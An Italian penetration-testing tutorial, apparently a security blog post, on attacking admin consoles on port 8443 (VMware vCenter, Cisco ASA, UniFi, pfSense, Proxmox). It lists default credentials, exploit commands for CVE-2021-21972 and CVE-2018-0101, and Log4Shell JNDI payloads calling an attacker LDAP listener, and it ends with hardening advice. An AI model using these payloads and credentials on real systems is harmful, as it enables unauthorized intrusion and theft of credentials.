networking

Porta 8443 HTTPS Pentest: vCenter, pfSense, UniFi e CVE

Porta 8443 HTTPS Pentest: vCenter, pfSense, UniFi e CVE

Porta 8443 HTTPS alternativa: VMware vCenter CVE-2021-21972, pfSense RCE, UniFi Log4Shell, Cisco ASDM default credentials, certificate intelligence e TLS hardening.

  • Pubblicato il 2026-04-17
  • Tempo di lettura: 5 min

La porta 8443 TCP è la versione HTTPS della 8080 — ma con una differenza importante nella pratica: mentre la 8080 ospita spesso applicazioni web generiche, la 8443 è la porta preferita per le console di gestione dell’infrastruttura. Ci trovi dentro: VMware vSphere/ESXi (gestione di tutti i server virtuali dell’azienda), Cisco ASDM (firewall e VPN), UniFi Controller (reti wireless), pfSense (firewall), Plesk/cPanel (web hosting), Kubernetes Dashboard e qualsiasi pannello admin che lo sviluppatore ha messo “sulla porta sicura”. Il paradosso è che la “porta sicura” ha il TLS ma spesso non ha nient’altro: credenziali di default, CVE non patchate e nessun WAF. Se la 8080 è la porta degli sviluppatori, la 8443 è la porta dei sysadmin — e compromettere una console di gestione infrastrutturale equivale a prendere il controllo di tutto.

1. Identificare il Servizio #

bash
nmap -sV -p 8443 --script=ssl-cert 10.10.10.40
text
PORT     STATE SERVICE  VERSION
8443/tcp open  ssl/http Apache Tomcat
| ssl-cert:
|   Subject: CN=vcenter.corp.internal
|   Issuer: CN=VMware default

Il certificato TLS è una miniera di informazioni. Leggi attentamente: Subject CN, Issuer, SAN (Subject Alternative Names), Organization.

bash
# Banner HTTP
curl -sk https://10.10.10.40:8443/ -I
curl -sk https://10.10.10.40:8443/ | head -80
IndicatoreServizioImpatto
CN=vcenter.* o HTML con “vSphere”VMware vCenterCritico — gestisce tutti i VM
CN=esxi.* o “VMware ESXi”VMware ESXiCritico — hypervisor
Server: ASDM o pagina Cisco AdaptiveCisco ASA/ASDMAlto — firewall/VPN
HTML con “UniFi”UniFi ControllerMedio — rete wireless
HTML con “pfSense”pfSenseAlto — firewall
HTML con “Plesk”PleskAlto — hosting panel
Server: Apache Tomcat genericoTomcat HTTPSVedi porta 8080
Server: Kubernetes DashboardK8s DashboardCritico — vedi porta 6443
HTML con “Proxmox”Proxmox VECritico — hypervisor

2. VMware vCenter / ESXi #

VMware vCenter gestisce tutti gli hypervisor ESXi dell’azienda — le macchine virtuali, gli snapshot, lo storage, la rete. Compromettere vCenter = compromettere ogni VM del datacenter.

Enumerazione #

bash
# Versione vCenter
curl -sk https://10.10.10.40:8443/sdk/vimServiceVersions.xml

# API REST (vSphere 6.5+)
curl -sk https://10.10.10.40:8443/rest/com/vmware/cis/session -X POST \
  -u "administrator@vsphere.local:VMware1!"

Default credentials VMware #

UsernamePasswordContesto
administrator@vsphere.localVMware1!vCenter SSO default
rootvmwareESXi root (vecchie versioni)
adminpasswordAppliance management

CVE VMware (critiche e attivamente sfruttate) #

CVE-2021-21972 — vCenter RCE pre-auth (CVSS 9.8)

bash
# Verifica
curl -sk https://10.10.10.40:8443/ui/vropspluginui/rest/services/uploadova

Se risponde 200 o 405 (non 404) → probabilmente vulnerabile. Upload di file arbitrario → webshell → RCE.

bash
# Exploit tool
python3 CVE-2021-21972.py -t https://10.10.10.40:8443 -f webshell.jsp

CVE-2021-22005 — vCenter file upload RCE (CVSS 9.8)

bash
# Verifica endpoint CEIP
curl -sk https://10.10.10.40:8443/analytics/ceip/sdk

CVE-2023-34048 — vCenter out-of-bounds write (CVSS 9.8)

DCERPC protocol exploitation — pre-auth RCE sulle porte 443/8443.

bash
# Scan automatico
nuclei -u https://10.10.10.40:8443 -tags vmware

Post-auth vCenter #

Con accesso vCenter:

  • Snapshot VM → dump memoria di una VM → estrazione credenziali
  • Console VM → accesso diretto al desktop di qualsiasi macchina virtuale
  • Deploy OVA → crea una VM attacker nella rete interna
  • Clona VM → copia una VM per analisi offline
  • vMotion → sposta una VM su un ESXi sotto il tuo controllo

3. Cisco ASA / ASDM #

ASDM (Adaptive Security Device Manager) è l’interfaccia web del firewall Cisco ASA — gestisce regole firewall, VPN, NAT.

Default credentials #

UsernamePasswordNote
ciscociscoIl classico
adminadminAlternative
(vuoto)(vuoto)Alcune versioni senza setup
pixciscoLegacy PIX
bash
curl -sk https://10.10.10.40:8443/admin/

CVE Cisco ASA #

bash
searchsploit cisco asa

CVE-2018-0101 — Cisco ASA WebVPN RCE (CVSS 10.0)

Double free vulnerability nella funzione WebVPN — pre-auth RCE sul firewall:

bash
use exploit/linux/http/cisco_asa_webvpn_rce
set RHOSTS 10.10.10.40
set RPORT 8443
run

CVE-2020-3580 — XSS persistente nella WebVPN UI — permette session hijacking dell’admin.

Con accesso ASDM:

  • Leggi le regole firewall (capisci cosa è permesso e cosa no)
  • Leggi la configurazione VPN (PSK, certificati, pool IP)
  • Modifica le ACL per aprire porte
  • Estrai credenziali VPN salvate

4. UniFi Controller #

Ubiquiti UniFi Controller gestisce access point, switch e gateway UniFi. Sulla 8443 (HTTPS) e 8080 (HTTP per device inform).

Default credentials #

bash
# Il setup iniziale richiede di creare un account
# Ma molti lasciano: ubnt:ubnt (vecchie versioni)
curl -sk -X POST https://10.10.10.40:8443/api/login \
  -H "Content-Type: application/json" \
  -d '{"username":"ubnt","password":"ubnt"}'

Enumerazione rete wireless #

bash
# Con accesso admin:
curl -sk https://10.10.10.40:8443/api/s/default/stat/sta \
  -H "Cookie: unifises=$SESSION_COOKIE" | python3 -m json.tool

Espone: tutti i dispositivi connessi alla rete wireless (MAC, IP, hostname, traffico), SSID con password WPA, configurazione VLAN.

La password WPA è visibile in chiaro nella configurazione del wireless network → accesso diretto alla rete Wi-Fi dell’azienda.

CVE UniFi #

CVE-2021-44228 — Log4Shell

UniFi Controller 6.x usava Log4j ed era vulnerabile a Log4Shell:

bash
# Payload nel campo username del login
curl -sk -X POST https://10.10.10.40:8443/api/login \
  -H "Content-Type: application/json" \
  -d '{"username":"${jndi:ldap://10.10.10.200:1389/exploit}","password":"test"}'

Se il server fa una richiesta LDAP al tuo listener → vulnerabile. Usa JNDI exploit server per RCE.

5. pfSense #

pfSense è il firewall/router open source più diffuso. La web UI è sulla porta 443 o 8443.

Default credentials #

bash
# admin:pfsense (il default universale di pfSense)
curl -sk https://10.10.10.40:8443/ \
  -d "usernamefld=admin&passwordfld=pfsense&login=Sign+In"

Post-auth pfSense — RCE #

pfSense ha una funzione Diagnostics → Command Prompt che esegue comandi come root:

bash
# Via web UI o API
# Diagnostics → Command Prompt → "id"
# Output: uid=0(root) gid=0(wheel)

Con accesso admin a pfSense:

  • Esegui comandi come root — shell completa
  • Leggi le regole firewall — capisci la rete
  • Configura VPN — crea un tunnel verso di te
  • Modifica DNS — redirect traffico
  • Leggi credenziali VPN (OpenVPN, IPsec) in chiaro nella configurazione

CVE pfSense #

bash
searchsploit pfsense

CVE-2022-31814 — pfBlockerNG RCE pre-auth (se il plugin è installato).

6. Proxmox VE #

Proxmox Virtual Environment è un hypervisor open source alternativo a VMware.

bash
# Default: root:password_set_during_install
# Ma il token API a volte è debole
curl -sk https://10.10.10.40:8443/api2/json/version

Con accesso Proxmox → stesso impatto di VMware: console VM, snapshot, deploy nuove VM.

7. Certificate Intelligence — Cosa Rivela il TLS #

Su ogni servizio 8443, il certificato TLS è una fonte di intel:

bash
# Estrai informazioni dal certificato
echo | openssl s_client -connect 10.10.10.40:8443 2>/dev/null | openssl x509 -text -noout
bash
# Oppure con Nmap
nmap -p 8443 --script=ssl-cert 10.10.10.40

Cosa cercare nel certificato:

  • Subject CN: hostname interno → vcenter.corp.internal, fw-hq.corp.local
  • SAN: tutti gli alias del server → DNS:vcenter.corp.internal, DNS:10.10.10.40, DNS:vc.corp.com
  • Issuer: CA interna → nome dell’organizzazione, presenza di ADCS
  • Organization: nome legale dell’azienda
  • Validità: certificato scaduto → manutenzione carente → probabilmente non patchato
bash
# TLS quality assessment
sslscan 10.10.10.40:8443
testssl.sh https://10.10.10.40:8443

Finding TLS comuni: TLS 1.0/1.1 abilitati, cipher deboli, certificato self-signed, certificato scaduto.

8. OWASP — Vulnerabilità Web Specifiche per Admin Panel HTTPS #

Le interfacce di management sulla 8443 hanno pattern di vulnerabilità ricorrenti:

Session management debole #

bash
# Cookie senza flag Secure su HTTPS → inconsistente
curl -sk -v https://10.10.10.40:8443/login 2>&1 | grep "Set-Cookie"
# Se manca HttpOnly → XSS può rubare la sessione

# Session ID prevedibile?
# Fai 10 login e confronta i session token — se sono sequenziali → session prediction

CSRF su operazioni critiche #

bash
# Le console admin spesso non hanno protezione CSRF
# Un admin che visita una pagina malevola può:
# - Creare utenti admin
# - Modificare configurazioni
# - Eseguire comandi (se la console li supporta)

# Test: l'endpoint accetta la richiesta senza CSRF token?
curl -sk -X POST https://10.10.10.40:8443/api/users/create \
  -H "Cookie: session=$ADMIN_SESSION" \
  -d '{"username":"backdoor","password":"test","role":"admin"}'

Default TLS configuration #

bash
# Renegotiation insecure
openssl s_client -connect 10.10.10.40:8443 -reconnect

# BEAST, POODLE, ROBOT
testssl.sh --vulnerable https://10.10.10.40:8443

9. Detection & Hardening #

  • Credenziali uniche e forti per ogni pannello — mai default
  • MFA su tutte le console di gestione
  • Certificati firmati da CA interna — non self-signed
  • TLS 1.2+ only con cipher moderni (AES-GCM, ECDHE)
  • IP whitelist — console raggiungibile solo da jump host
  • VPN — non esporre mai VMware/Cisco/pfSense su Internet
  • Patch — le CVE su pannelli di gestione sono le più sfruttate
  • Audit log — ogni accesso e ogni modifica loggata
  • Session timeout breve per le console admin

10. Cheat Sheet Finale #

AzioneComando
Nmap + certnmap -sV -p 8443 --script=ssl-cert target
Bannercurl -sk https://target:8443/ -I
Cert detailsecho | openssl s_client -connect target:8443 2>/dev/null | openssl x509 -text
TLS scansslscan target:8443 o testssl.sh https://target:8443
VMware
Versioncurl -sk https://target:8443/sdk/vimServiceVersions.xml
Default credsadministrator@vsphere.local:VMware1!
CVE-2021-21972curl -sk https://target:8443/ui/vropspluginui/rest/services/uploadova
Nucleinuclei -u https://target:8443 -tags vmware
Cisco ASAadmin:admin, cisco:cisco
UniFiubnt:ubnt + POST /api/login
Log4Shell{"username":"${jndi:ldap://attacker:1389/}","password":"x"}
pfSenseadmin:pfsense → Diagnostics → Command Prompt
Proxmoxcurl -sk https://target:8443/api2/json/version
Searchsploitsearchsploit vmware vcenter cisco asa pfsense unifi proxmox

Riferimento: VMware Security Advisories, Cisco ASA guides, pfSense docs, OWASP. Uso esclusivo in ambienti autorizzati. https://cyberpanel.net/blog/port-8443

Il tuo vCenter è esposto? Il firewall ha ancora la password di default? Prima che lo scopra qualcun altro: penetration test HackIta. Per diventare un professionista della security: formazione 1:1 con mentorship.

#porta-8443 #vmware-vcenter-pentest #https-management-panel #cve-2021-21972

DIVENTA PARTE DELL’ÉLITE DELL’HACKING ETICO.

Accedi a risorse avanzate, lab esclusivi e strategie usate dai veri professionisti della cybersecurity.

Non sono un robot

Iscrivendoti accetti di ricevere la newsletter di HACKITA. Ti puoi disiscrivere in qualsiasi momento.